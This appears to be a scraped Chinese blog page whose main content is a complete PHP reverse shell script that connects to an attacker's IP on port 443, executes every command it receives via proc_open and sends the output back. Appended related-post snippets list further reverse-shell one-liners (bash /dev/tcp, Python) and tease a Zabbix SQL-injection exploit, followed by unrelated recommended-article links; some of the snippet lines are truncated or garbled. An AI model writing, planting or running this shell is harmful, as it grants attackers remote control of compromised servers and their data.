<?php 

error_reporting (E_ERROR);

ignore_user_abort(true);

ini_set('max_execution_time',0);

$os = substr(PHP_OS,0,3);

$ipaddr = 'x.x.x.x';

$port = '443';

$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));

$cwd = getcwd();

$msg = php_uname()."\n------------Code by Spider-------------\n";

if($os == 'WIN') {

    $env = array('path' => 'c:\\windows\\system32');

} else {

    $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');

}

if(function_exists('fsockopen')) {

    $sock = fsockopen($ipaddr,$port);

    fwrite($sock,$msg);

    while ($cmd = fread($sock,1024)) {

        if (substr($cmd,0,3) == 'cd ') {

            $cwd = trim(substr($cmd,3,-1));

            chdir($cwd);

            $cwd = getcwd();

        }

        if (trim(strtolower($cmd)) == 'exit') {

            break;

        } else {

            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

            if (is_resource($process)) {

                fwrite($pipes[0],$cmd);

                fclose($pipes[0]);

                $msg = stream_get_contents($pipes[1]);

                fwrite($sock,$msg);

                fclose($pipes[1]);

                $msg = stream_get_contents($pipes[2]);

                fwrite($sock,$msg);

                fclose($pipes[2]);

                proc_close($process);

            }

        }

    }

    fclose($sock);

} else {

    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);

    socket_connect($sock,$ipaddr,$port);

    socket_write($sock,$msg);

    fwrite($sock,$msg);

    while ($cmd = socket_read($sock,1024)) {

        if (substr($cmd,0,3) == 'cd ') {

            $cwd = trim(substr($cmd,3,-1));

            chdir($cwd);

            $cwd = getcwd();

        }

        if (trim(strtolower($cmd)) == 'exit') {

            break;

        } else {

            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

            if (is_resource($process)) {

                fwrite($pipes[0],$cmd);

                fclose($pipes[0]);

                $msg = stream_get_contents($pipes[1]);

                socket_write($sock,$msg,strlen($msg));

                fclose($pipes[1]);

                $msg = stream_get_contents($pipes[2]);

                socket_write($sock,$msg,strlen($msg));

                fclose($pipes[2]);

                proc_close($process);

            }

        }

    }

    socket_close($sock);

}

?>

fsockopen反弹shell脚本的更多相关文章

  1. 如何DIY一个简单的反弹Shell脚本

    00起因 之前在一个服务器上做测试的时候需要从本地连到服务器上,但是服务器没有开ssh服务,但是有python环境,想着自己写一个脚本可以从自己本地连接到服务器,然后服务器端可以将处理完的请求结果返回 ...

  2. 常用的反弹shell脚本

    bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/ <& >& Python shell 反弹脚本 #!/usr ...

  3. Zabbix sql注入漏洞脚本执行反弹shell

    exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...

  4. Linux下反弹shell的种种方式

    [前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里s ...

  5. 从一次渗透谈到linux如何反弹shell

    零.绪论 背景: ThinkPHP框架的--> 找到一个OS命令注入(很简单的Burp可以直接扫出来的那种):页面配置系统默认网关处. 一.渗透过程 1.首先看了一下,没有回显. 2.用ceye ...

  6. linux反弹shell

    参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-s ...

  7. linux下反弹shell

    01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali        ...

  8. Linux 反弹 Shell

    攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写 ...

  9. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规 ...

随机推荐

  1. CSS 解决z-index上层元素遮挡下层元素点击事件问题

    解决z-index上层元素遮挡下层元素点击事件问题 by:授客 QQ:1033553122 开发环境 Win 10 element-ui  "2.8.2" Vue 2.9.6 需求 ...

  2. SAP S4HANA TR传输之操作

    SAP S4HANA TR传输之操作 事务代码: STMS_IMPORT, 选中请求,点击漏斗按钮, 输入要传输的TR(可以多个),然后回车, 鼠标单击请求号,按F9, 然后传输, 点击按钮'是',系 ...

  3. 避免 C# TreeView NodeMouseDoubleClick 双击事件的节点错位的错误行为

    避免 C# TreeView NodeMouseDoubleClick 双击事件的节点错位的错误行为 在使用WinForm标准的TreeView控件的过程中,添加了如下类似的节点 parentNode ...

  4. glusterFS空间不够了怎么办

    查看glusterFS情况 oc project infra-storage oc get all #找到其中一个pod,前缀为 po/glusterfs-registry-xxxx oc exec ...

  5. C# sync/async 同步/异步

    同步方法 Console.WriteLine($")} {DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss.fff")}******* ...

  6. ELK日志分析系统(2)-logspout收集容器日志

    1. 概述 安装了ELK之后,就是要考虑怎么获取log数据了. 收集log数据的方式有很多种: 1). beats采集数据发布到logstash 2). Filebeat采集数据发布到logstash ...

  7. Android 项目优化(二):启动页面优化

    一.启动页黑屏的问题 1.1 问题现象描述 Android App 启动页面黑屏的问题,现象表现为:Android 开发 App 启动时若没有做特殊处理的话,会出现一瞬间的白屏现象.即使启动页界面就加 ...

  8. JS 测试 Prototype

    JS 测试 Prototype 测试 JavaScript 框架库 - Prototype 引用 Prototype 如需测试 JavaScript 库,您需要在网页中引用它. 为了引用某个库,请使用 ...

  9. 分享一个酷炫动态登录页面html

    话不多说,如下图: 代码如下: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <H ...

  10. [PHP] 编译安装swoole

    不知道为啥,家里的网访问不了pecl.php.net,这也就没有办法直接使用pecl install swoole安装swoole,也可以直接进行编译安装 在git仓库下载源码 https://git ...